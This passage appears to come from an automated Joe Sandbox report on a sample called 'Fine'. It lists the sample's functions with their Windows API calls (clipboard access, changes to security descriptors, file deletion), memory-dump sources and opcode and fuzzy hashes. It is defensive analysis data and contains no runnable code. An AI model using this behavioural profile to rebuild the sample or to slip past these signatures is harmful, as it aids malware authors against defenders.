                                                                                                                                                                                                                                                                                                                            Function 00226AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 636fab422e5acb77ec940e6df69af419126560e7d0169c1c469764224a03aced
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 318ce05556873d28cba9d92928c45146f5d462e282bca8f8ed3133a375c9f65c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 636fab422e5acb77ec940e6df69af419126560e7d0169c1c469764224a03aced
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2FF0E572714649BAD7304FE5A80D7B9F7E8BB14318F10491AD4D582182CBF244E49751
                                                                                                                                                                                                                                                                                                                            Function 001D684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9fcd5c1119ddbfe6e9da152d21561946f0678b5d17114717f8a14a5a4bb90701
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6F0F87550020DFFDF05DF90C941EAEBBB9FB14318F208485F9159A251C336EA61ABA1
                                                                                                                                                                                                                                                                                                                            Function 001D3907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 001D3963
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 89f58db4bb9c5ce769bfc4a7e3fca8cfc9764105ce051ca0f240cb45189a6791
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 136bd6ef6c1dd18ecf2abd7b1de5e28fe932e0c09ea5b5c61ac391e02f143eaf
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89f58db4bb9c5ce769bfc4a7e3fca8cfc9764105ce051ca0f240cb45189a6791
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1F037719143189FEB529F28EC497967BBCA70270CF0400E5A64496281DBB45B8CCF51
                                                                                                                                                                                                                                                                                                                            Function 001D3A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001D3A76
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 3b723d8dd943dd203c4c2b1b4823601a867ea5751cc3eb6e92419f9e38e9f830
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d0ea857245c9f4a0edf93089eeeb582639871d12ff90922bfb762feafc87cbe8
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b723d8dd943dd203c4c2b1b4823601a867ea5751cc3eb6e92419f9e38e9f830
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90E0CD72A0012857CB10A258AC05FDE77DDDFC8790F044071FC05D7258D9B4DDC08590
                                                                                                                                                                                                                                                                                                                            Function 0021071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00210A84,?,?,00000000,?,00210A84,00000000,0000000C), ref: 00210737
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: a4ab7a918f1556f5a828d74096be930cca8fc8af49020533bd589d77648f70cc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 087917199467cc9d0628e589c4294d3533de8c2e42d253e768d9835452c6ae6f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a4ab7a918f1556f5a828d74096be930cca8fc8af49020533bd589d77648f70cc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1D06C3210010DBBDF028F84ED06EDA3BAAFB4C714F018040FE1856060C772E821AB90
                                                                                                                                                                                                                                                                                                                            Function 0023EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,0023D840), ref: 0023EAB1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e6b38d474bce60ae056442822b5c207b3743d6ae3435518966843b11ec00d892
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3ffec90dd1e945386e8b7e97766ad1f12959160e96444f45f6b603fa55bac779
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e6b38d474bce60ae056442822b5c207b3743d6ae3435518966843b11ec00d892
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97B092A442060105AD280E386A9D999330078423A5BDE1BC0E879C50E2C379A82FA950
                                                                                                                                                                                                                                                                                                                            Function 0024664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DC54: FindFirstFileW.KERNEL32(?,?), ref: 0023DCCB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0023DD1B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0023DD2C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DC54: FindClose.KERNEL32(00000000), ref: 0023DD43
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0024666E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 81f807c48272d0cba3b13329fb47238fb91ad068d62e3c625d2ab8d62bf03309
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 11672ccecfc004f011431f878c3904f759de75715c8d06cd4c7f13bcbc25d736
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81f807c48272d0cba3b13329fb47238fb91ad068d62e3c625d2ab8d62bf03309
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9F08C366102048FCB14EF5AD845B6EB7E9AF98320F05844AF9098B352CB74BC11CF91

                                                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                                                            Function 002314AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00231A60
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A6C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A7B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A82
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00231A99
                                                                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00231518
                                                                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0023154C
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00231563
                                                                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 0023159D
                                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002315B9
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 002315D0
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 002315D8
                                                                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 002315DF
                                                                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00231600
                                                                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00231607
                                                                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00231636
                                                                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00231658
                                                                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0023166A
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00231691
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00231698
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002316A1
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002316A8
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002316B1
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002316B8
                                                                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 002316C4
                                                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 002316CB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: GetProcessHeap.KERNEL32(00000008,002314FD,?,00000000,?,002314FD,?), ref: 00231AED
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,002314FD,?), ref: 00231AF4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,002314FD,?), ref: 00231B03
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 46d5928b1c5903757c23442f0321b979f939e1abace12158f23bc28a2498a942
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 4edcc9075cb6ba5cec3ae3f2ccd0e0efa627f80b0cb4793907c1a000f785def1
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46d5928b1c5903757c23442f0321b979f939e1abace12158f23bc28a2498a942
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C717CB2A1020AABDF10DFA5EC49FAEBBBCBF04340F088515E915E7191D7719925CFA0
                                                                                                                                                                                                                                                                                                                            Function 0024F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(0026DCD0), ref: 0024F586
                                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0024F594
                                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0024F5A0
                                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0024F5AC
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0024F5E4
                                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0024F5EE
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0024F619
                                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0024F626
                                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0024F62E
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0024F63F
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0024F67F
                                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 0024F695
                                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000F), ref: 0024F6A1
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0024F6B2
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0024F6D4
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0024F6F1
                                                                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0024F72F
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0024F750
                                                                                                                                                                                                                                                                                                                            • CountClipboardFormats.USER32 ref: 0024F771
                                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0024F7B6
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1b7a8ded0fc9ec3b7df958a92ba7be67bb9b779f7813221c4bc0cbbd12cdd189
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0588d6c720119af4022c091b0909ef268de27aa6a47fd7ee7b1e3f4c0b988ec2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b7a8ded0fc9ec3b7df958a92ba7be67bb9b779f7813221c4bc0cbbd12cdd189
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D61D5316143069FD304EF20E988F6AB7A8EF94704F14856EF856872E2DB71DD45CB61
                                                                                                                                                                                                                                                                                                                            Function 002473D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00247403
                                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00247457
                                                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00247493
                                                                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002474BA
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 002474F7
                                                                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00247524
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 0cd38852c66df291f9dd6fd9996d9695f0245b683fff0c6934d71dc4ce84f4e0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6f56076d4e41f189c0b48d00ec9fc016b3ff4f80d19c07db5a591800428cac4d
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0cd38852c66df291f9dd6fd9996d9695f0245b683fff0c6934d71dc4ce84f4e0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AED16E72508344AEC314EF65C895EAFB7ECAF98704F40491EF985C7292EB74DA44CB62
